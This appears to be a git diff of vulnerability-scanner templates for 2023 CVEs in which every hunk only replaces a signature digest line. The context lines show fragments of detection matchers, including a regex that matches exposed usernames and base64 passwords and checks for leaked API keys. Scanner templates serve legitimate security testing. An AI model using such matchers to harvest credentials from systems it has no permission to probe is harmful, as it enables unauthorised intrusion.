4a0a00473045022100c72e388d83be779eae11d3636afc409495de936dfa859dff8ff69d9e4dd4a15802207594bec3402c8d72da7fc37222348df75178687c59732812c7b893921365a518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a952678ae86dae9a2000d260905d980dbf78991bd59b1171724367b6498ceeec022100f953232b2e97fbcd222f2a7a5883a0cefb7cb6f897e9402226c706967bcfded3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index e91ffffb5a..30dc5b1d7d 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a00463044022018c2cd802d511a3ec6b3a5e13a8ef5069df64208c7bd9f7ef8fe07e54510f4ef02206d9261b2d4c426dea6831bab220898c4613025136f1f8bed4cdba7e34beb8f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205038e6120fa114f34508a9045dd6dc65f891cc5c9a393034fe1b0d8bfe8c848d022100ba9cb87c17ffbbc41a4ed0d2977869a86cdb4b30886fc3c032a36b12964856b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 01a01ffc9b..806c3959f8 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Select Service(s)", ">")' condition: and -# digest: 4b0a0048304602210081a78e8845024d25eab47ddc2ea3b7ce21b4868e8bcd8751b905575ab1a1cce2022100bc0e77f12b39336c4e7b2bfc219d37a5fa9ba58f44352aefca12decceb34a147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf132073217cb77de7ed0548b509ed876572eeb7fecd5f659a6276eed21735f502210097ddeb29ce9316744ce029231b514e03212f2d972b0e296cbf64cb18cb3b4e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 1ec0ae73d2..a10231e6fa 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' condition: and -# digest: 490a004630440220404eff835027749f25ade1644a56cf1698eb2c6a9ad6553068c61c6023e9bae40220384c63acecfb509a720f108a0c47a0f553107ff614841960525380056c907818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080ac094c8bac706dec5b9aaff33fe5b1cf5d440c38e72ab153ae179d8609d7dc022100e03c8ef4d271818cf34d18719585e2c6413a277b292cf0309ff69978514a86b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index 6451e653ef..8abad65a7b 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", ">")' condition: and -# digest: 490a00463044022034beeb12d66272799e9718ec924c454b445020129f3be7e51f27cac48824a99902201586952e2c5671c95203f1e81868eae762c7450bc1aec0dea74dd5bccdd96ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a9ee27d504cde8dfc06a47e8d49fdf63ee33e9e6654e290898db2ae143bb3f20220160f64074ef588bae2217521f1d5912cab6373816198afa00a65ed10717aca8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index babf0a3d96..aafc07dd22 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and -# digest: 490a00463044022014e56b9021d2442982b86a1d21892f238398d218d593b939cf613c4485737f8802205ae68c8fd53c1b5048efba29b99e73f220fdcdc2b85dbdfb6c4418e942d82d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a418b709d2b7082873e897a36eafc1bbb1f3aa8709f7f2e4c49d412cef87d40e022100afe22952963f904e49afc245fd7b7ebce634024e4f0289a90de498a8574096d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 839f8dab6d..e4930430c5 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -50,4 +50,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(header, 'Bad Request') condition: and -# digest: 4b0a00483046022100df63da243752a7c8ae5b4419c6c0bc3d012438f3aad942de819106d8d7dcad6d022100869cb12653434026c70d72cf0b96cc8bded65bf24f15d64149a11ca8a0ad02f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f301d69b556a95e9154963b4f371aba1261981f5a5201b53ae8f30f12833908402207c56e74c9c34d7c1a82534086eac52d23e022a6b59447e7f877a92e227d79efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 90898a1680..bfb288fc63 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -45,4 +45,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(body, 'The comparison expression does not consist of three elements') condition: and -# digest: 4a0a004730450220566ec421ad7c50d5c1ea0f5fc891bbfc4415f305269b368b4415cf400032ab73022100f632ad54d2e5af16208befc75b62c9847e5d9a1fc9fcf40f2f293b0f48e4e243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220405aa3356f11e260c674c3e45a4333571ad339aac53cdc3eabe2736ecf752c8502207a342b810f3fcb5adf83a17f60888d57f6a458937e755ececc1fb862f3e8d713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 0ddb1394a8..647348cb75 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "") && contains(body_2, "ditty")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a0047304502200c8125e1b2756d93127dccae80839b4c8c96616d63a000b81bf2b9f2032630910221008845ebdd0ea5cac9c9e9384d760e14af1ad449f31e8be0386857c03cc18433dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c515dc77b4cc4aa9f91298fc8d13c42df8117c4f8d63c6e62d3002ca0576a6e80221009dcdddaf6f1074a6cc16ea30e388f2677769dd9d6b38cc02694849c16a146974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 1c0bbed02a..15f2253e2c 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "New Question", ">")' condition: and -# digest: 4a0a004730450220573b221f96c005a1ce69b11406267e60cf2fbe090ed4f46ff8e7bb16998e44aa022100fa56d9f414f55ccace60412ec5cac4c7ddf27c165a80761b51be1ead05e38e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002b9e872ab843ef7e6c81bd5a514ceeabce0a6488e8033a2e883c53539c8cddf02205c03b386c06890d214ae90d4f79d189025d15d7ffa668ad74119ff5d23491d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index bfab310376..f786b71686 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -53,4 +53,4 @@ http: part: header_2 words: - text/html -# digest: 490a0046304402201643b88d733d26e6806782978b52461d265bd0abf68328a30b05fe8912612357022038b9d82a8da8c11ea5f55e5723d733d3456e6ca29780cab4460c3e48805fd639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200655a96e735e87963a7690ba044aa123f88b06fa70877f5c00d977959a5c094002200a7012dcc63dac74f65fb63e04cf69e68a5c0c1c5f6bd6d179f64140d1d90f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 35ee14c414..be08a55d80 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' condition: and -# digest: 4b0a00483046022100a28b3fde66ec316e5d35e1bf44412d58add66c90225ea0a9fa425fc2828d6f47022100907ceb1d8aa34797e99ee9cc6bc997a324aecc9e2dfd80ee8824de4f81b07ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a134453e2464f93bf132fd8db6c09f27613be39ba4c0aaef68337bd060407ff0221009c766e234ab5de0d38872d51aaf73fb6396249477d8cfef7840159bba28559dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 84fe4bb11e..b748dfe238 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205bfba5a589782be2d0036f90503b330fe659ef02b9af5ab8b2f27c84808f9788022074a92f73d65317b9a41a584965fdb4453c17e7ac9d0ae54eb460d3ceff37c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 2221179ef9..e00b6dbf25 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100aabc5f4a70666c4149f432645c3b9306de4ad4d670a3c80bbd3419cdeaeecc17022100ed6b3b25edee45a8c93e2996d53d2cda7209d5cee5c38864ca5ec841b526cda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a0cc69486d6d9cbda953429f12b560b53462ee713d9e032f548c492903087c022046613a2e9d8e8ce1405dcf3366c8f551d340a96f7c337ed0c3495273864b492e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 5a7b1fe0c4..45a9412938 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -57,4 +57,4 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100c2f79dc8a421606bbe12a26b6bcd3651ce312cbeee353eb0058182d1b3926db2022100c22097f0aa51802f172b8c79656b3931df3f2aa0d30b5e94c42bb6c2ff02f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083964b313e7a000d9ca10222db41e2eee010e7cd8de85ee18f2db5cad563203a022032222c84acefa05972a5e7cbc5abe8dc5b06bb5c6fe3f3a7f3dbfe496185e9a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 5574d98b8e..83b280095d 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -47,4 +47,4 @@ http: part: body words: - 'Skype' -# digest: 4a0a0047304502204d385a1c2eabf2010aab8e2dc414636c821517c645d7f7454d930d398747d67b022100cd62b6a6ce39bd5762d8089f31dc55530c0182275b0fdc256b5ed3300e53e4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008574c7ffe3f2d223a370c177cd5f6a730ad922172a140cbffc9f5a9f8816d7b2022063b5865c4679400fa4eccb249c810758f208573eb01c9d2c7dd29a12a74aa6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 6d4426101b..03cb6859b5 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -48,4 +48,4 @@ http: - "CraftCMS" condition: and case-insensitive: true -# digest: 4b0a00483046022100bef16c09352bcddedd249be504eae14354554e288442e838bc5ceefa5149a6370221009480bd063880d15392df84fc7d6c7d256677d9ddb190425ccf319ab5b64c1716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aad1f217ee128d29074789cd117c40e3282239935d06572fcaa77b86163f341e02210095f7a4e31640bdb832d3ea6eca1444a46122d4ab75e9694e88c664052c6699d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 196442230c..fd3dbfd808 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056c740fc5645290237c9ed3d38594f1c08b5e60e15db07c695228b0949457784022100fb351a9723c5de4a59566e98322107608ec9657e3602c71dc050b9b375994aaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096ac59ffe6bcfa5dd7100c93ac3af8d09f2a4cac40b28fad5dabf9f9c9b5bcd8022100df7fdc6e652c63a0d7016de1c4e2968d33bed7836b40795689ba1a90e70c1e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 97ed5429c7..8b171bec3f 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -74,4 +74,4 @@ http: regex: - 'value="(.*?)"' internal: true -# digest: 490a00463044022026f4c8ba9cd64942e6b47aeca1ae4c7a0428af0449dd14aef984e0d8c1c6e09302204256a4b88da06f8eee47c94cbde42e81ae16b511b6da5979bd88ea9761bae7f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205eaa6928145838a264b81009174c0dc9d2d07efed1abcc67ad062af010acdc59022100c3d2486f63bf27c5ee5f7979f5592a45a508ecffe3e3a82bd6606f185a3194d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 9002704bfb..50e8d243c7 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -74,4 +74,4 @@ http: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and -# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index 9af87f47a0..4720b4b23b 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220201c4d48716a02d2c66be4a7318bc2ac1dc92830e14b1535590a9c46f12dd8b702207930b8b7e7e95cef77c5f136bcadcbbe6b1dff80070bdf6dad62f0623c96f6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index 98b9918453..fca1c6ab1c 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -106,4 +106,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1e9081fcf2640083fdd862acec818d87d0f43577b03501b09a3ffb1e9fa52a0022058a1099f807d9fb0552b82ca66443623a6b96ac354f97bb5a13b40777c73743b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index d3499af1d8..59ff524e0e 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"' -# digest: 4a0a0047304502207394fd4bf1e89bd3f82e011d999c60cb16f8e489eb83397b2cb5d1fd7643db0e022100d5913daa6cf013217df6a366ae32509ce0316d4ac4be68b7150926e99c883030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055b449c697f3cf7d0fd4bbb71d220dfd5d97c2a8f9f20272f94d63f3e24906b2022100c663ea58c5cf68bfa82ec127044032a57e3a96d96e988a7115490ec416211cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 732dc80970..2f903a2820 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502202e377871e2dcf45ea88526dd773225b7426c810ec8d964008e5ae7740b376bbd022100ee2a52abdc80ae957ebaddab106be03f26fd93e09e9f1290a10149d53d6aa2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6d31b975d49d517924b62d996e9139c8afb6b35784a456bd830be0c53d4906e02200cc68e9cba608c058b0ffac9e1e7f36534ab2efa005af111f87169ebc1b9bff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index 6f785e9c29..f5c0336200 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502210094826e0df08385c1006098c627611803a7a886633321a9b354a9f46b3fe45475022022c5d44415b7bc83f55c50510556c7b4d13feb3317fb5e82ef3fc4fd9eaef1c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220310e54c3bfa2512ef8c5ed7a4a2f4404e38fac783268ba1c8e423271f4e6e74f02207a1dd30a82dadfd1dece2f3178c3eef779f0098c66d3f296198600563fa1b141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 49692b3e4c..0156015bfa 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -61,4 +61,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a3d00145dba4f11fa3c549cfa464edc1794ba65015e1ab6ff2f303f742b48ad02210089f51b3a2d6226c518403fa409af45ac3721bc5826816fda85b9e55db8d1b961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 18838f4b30..1b03319341 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -81,4 +81,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 4b0a0048304602210082f80177b7581f04212dc0576a4751ee20bdab22835edf2095f77a79c13757720221008fbe8e42bc297fe303de98bdf9b8426e646574e35cf00e0f6481f28a7b6e2bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202532b6c5eb4c8b86a6cbc92d99c1674017335e78d0932d798e89cbebd4e5e9e002210098facfd15b6f7d648364dcede3e8c1992b3c7a2d58b7b4200f5ce25ba1fc691a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 9cff578c2a..c5d526d415 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4a0364d29e6d0e864db602feaaae08fc127111b3fec57f533478cf3e87a10ca022100bbcf82e6d3554f4b048f608fede70c8cd68e70453354e55f9644a720664e29d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020896244e031d49e7315d5d7a04a1b190d61e9cb650d793b5043f1e715c994aa022100885c3f96f29b282e9f9657adafc6131cd3570d5aaad3a00ac6cf86145d578db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 612d04fdf4..1a4909be15 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -56,4 +56,4 @@ http: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and -# digest: 4b0a004830460221008fbb590bc361593981c4b4ca8788ce40ec113fa6cb5f66d0494289924511b5a50221008b3fce96d336a94a73797aaec994cc638d7b228ab77ab19cc9a08f89a1d4b9fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059f1e5596ee1f04789829fe74baa6cb52966bf9b3c4389095a78032a93765fdf0220434facfe54a80f0b3571fab017d7d4e1b2dffce3ab40ed44ad4d1ab1977a2ca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index b74ce8c896..aa04c22912 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -82,4 +82,4 @@ http: - "status_code_3 == 500 && status_code_4 == 404" - contains(body_3, "coldfusion.runtime") condition: and -# digest: 4a0a004730450220047bd272fa85a31954610677163c6d46bc1bc7e4cbe15197f0a08be5f0919fcf022100a0fbfd66e5f0e75667e67d3994d5f3fda3fa376e5401a3eee32f69955eb0e4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8c27c20ad5d3c1c52b7a1ad36e3d3e1ee89d1c63ce26c18b8cd328f88d34e0e0221009b45448145bd15637757560e893ba4584359745deb71a3cb2e6a88c3fe692517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 48b2ffe41f..c73b212557 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbe7607e0757fba526338e3de141fc45574561029d8df0e67ec0661ed4fa9ff802201f80e83613cd2bdbb2fb20e60560b066dc1c68da990157d9f6c49c9613db4636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100919530c2f7eb2d3d2714d81d366dfeb7bc9b208c1680d3cb1de728f8a718b6e402204a0caedb90860c959e6114777399de2c90c306bb411e57ff7b225308d11f8b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 3bce26624b..2ab6310d5b 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -57,4 +57,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "")' condition: and -# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220136a9de10e94de42f088109120fa3ba436becffc820d8cf6ca179b443cbe6528022022a9923ab3af464a7edfb72ae5f34ed2ea5a1ed918f98aefe7ce55f5cf7fe821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 501673e2a6..9d0c9e2e8c 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071bda73ca2ae11746f2c9685d5f5a43f5eef73cedecf65a6cdfa71c30d4a4e9c022100e71ac3a7b2ffbf2cf2a6215d2a11806033fd920b5cabe4378f53eefd1f6bb1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index bf24c77f4b..36eba8883d 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cea4d3768425ffc332055d1f40fd366c8091a06a7b799b66e8b91090b83543670221008f1b308f749b58447861c6a69747cf99284ce97abb240eca5b47bece1e7d1249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index cecb719429..984446aece 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -56,4 +56,4 @@ http: - status_code == 302 - contains(content_type, "text/html") condition: and -# digest: 4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ed47ceb0a90cf361c53d57e4de9cbf37f13e67f59c4ef3301f2b2df37b27d5e02210085057ec399c9228fdb57ce3ba2f16e674441a6a71eaa5d9a1e060407d67cd34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 7dc533eff5..2e270317c4 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 